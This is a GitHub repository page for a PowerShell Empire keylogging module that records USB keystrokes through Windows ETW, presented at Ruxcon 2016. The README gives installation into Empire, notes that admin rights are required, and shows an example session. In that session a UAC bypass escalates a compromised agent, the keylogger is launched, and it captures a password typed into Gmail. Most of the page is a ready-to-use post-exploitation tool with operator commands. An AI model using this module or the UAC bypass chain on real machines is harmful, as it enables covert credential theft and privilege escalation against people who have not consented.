Skip to content

CyberPoint/ETWKeyLogger_PSE

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
 
 
 
 
 
 
 
 

Repository files navigation

ETWKeylogger_PSE

PowerShell Empire module for our keylogging technique presented at Ruxcon 2016

Slides:
https://ruxcon.org.au/slides/

C# POC Code:
https://github.com/CyberPoint/Ruxcon2016ETW/tree/master/KeyloggerPOC

##Install Copy files to PSE:
Get-USBKeystrokes.ps1 -> <Empire_dir>/data/module_source/collection/
USBKeyLogger.py -> <Emipre_dir>/lib/modules/collection/

##Requirements Windows 7* and up
*Windows 7 - No USB 3.0 support
USB Keyboard
Admin priveleges
.NET 4.5.2

##Usage Requires admin to run (see UAC bypasses: privesc/bypassuac*). From a PSE agent session:

usemodule collection/USBKeylogger
execute

##Example Session (include UAC bypass)

(Empire: privesc/bypassuac) > [+] Initial agent PTELZMW2KL4NKZMD from 10.10.10.181 now active
interact PTELZMW2KL4NKZMD
(Empire: PTELZMW2KL4NKZMD) > usemodule privesc/bypassuac_eventvwr
(Empire: privesc/bypassuac_eventvwr) > set Listener 1
(Empire: privesc/bypassuac_eventvwr) > execute
(Empire: privesc/bypassuac_eventvwr) >
Job started: Debug32_gz2k1
[+] Initial agent BQSZGT2BZH3A4CUT from 10.10.10.181 now active
interact BQSZGT2BZH3A4CUT
(Empire: BQSZGT2BZH3A4CUT) > usemodule collection/USBKeylogger
(Empire: collection/USBKeylogger) > execute
(Empire: collection/USBKeylogger) >
Job started: Debug32_24nbw

ETWKeylogger, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
ETW library loaded
Callback registered. Starting keylogger
Started keylogger

[=== Gmail and 1 more page ‎- Microsoft Edge - 09/11/2016:13:02:20 ===]
password

##Contact Us
@CyberPoint_SRT
SRT [at] cyberpointllc.com

About

PowerShell Empire module for logging USB keystrokes via ETW

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published